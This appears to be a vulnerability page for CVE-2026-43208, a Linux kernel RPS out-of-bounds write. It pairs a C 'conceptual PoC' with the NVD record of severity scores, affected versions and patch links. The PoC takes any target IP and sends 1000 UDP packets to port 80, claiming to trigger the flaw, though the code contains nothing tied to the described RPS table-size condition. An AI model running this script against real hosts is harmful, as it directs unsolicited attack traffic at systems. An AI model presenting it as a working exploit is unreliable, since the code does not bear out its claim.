CVE-2026-43208

/* * Conceptual PoC for CVE-2026-43208 * This code attempts to trigger network traffic that exercises the RPS path. * Successful exploitation requires a vulnerable kernel version and RPS enabled. */ #include <stdio.h> #include <stdlib.h> #include <string.h> #include <unistd.h> #include <sys/socket.h> #include <netinet/in.h> #include <arpa/inet.h> void send_trigger_packets(const char *ip) { int sockfd; struct sockaddr_in servaddr; char buffer[1024] = "Trigger Data"; // Create UDP socket sockfd = socket(AF_INET, SOCK_DGRAM, 0); if (sockfd < 0) { perror("Socket creation failed"); exit(EXIT_FAILURE); } memset(&servaddr, 0, sizeof(servaddr)); servaddr.sin_family = AF_INET; servaddr.sin_port = htons(80); // Target port inet_pton(AF_INET, ip, &servaddr.sin_addr); // Send multiple packets to stress RPS logic for(int i = 0; i < 1000; i++) { sendto(sockfd, buffer, sizeof(buffer), 0, (const struct sockaddr *)&servaddr, sizeof(servaddr)); } printf("[+] Packets sent to target %s to trigger RPS flow_id issue.\n", ip); close(sockfd); } int main(int argc, char *argv[]) { if (argc < 2) { printf("Usage: %s <target_ip>\n", argv[0]); return 1; } printf("[*] Attempting to trigger CVE-2026-43208..."); send_trigger_packets(argv[1]); return 0; }

{"cve": {"id": "CVE-2026-43208", "sourceIdentifier": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "published": "2026-05-06T12:16:40.170", "lastModified": "2026-05-11T19:59:23.373", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nnet: do not pass flow_id to set_rps_cpu()\n\nBlamed commit made the assumption that the RPS table for each receive\nqueue would have the same size, and that it would not change.\n\nCompute flow_id in set_rps_cpu(), do not assume we can use the value\ncomputed by get_rps_cpu(). Otherwise we risk out-of-bound access\nand/or crashes."}], "metrics": {"cvssMetricV31": [{"source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-787"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.18", "versionEndExcluding": "6.18.16", "matchCriteriaId": "E0D300DB-AA68-4962-981D-EF9F5E97AACF"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.19", "versionEndExcluding": "6.19.6", "matchCriteriaId": "373EEEDA-FAA1-4FB4-B6ED-DB4DD99DBE67"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:7.0:rc1:*:*:*:*:*:*", "matchCriteriaId": "F253B622-8837-4245-BCE5-A7BF8FC76A16"}]}]}], "references": [{"url": "https://git.kernel.org/stable/c/5455a232edea6b946b99449f15ca771a8874a5a6", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/8a8a9fac9efa6423fd74938b940cb7d731780718", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/ed712dc0d64dee5f0d05e4d8ca57711f8a9c850c", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}]}}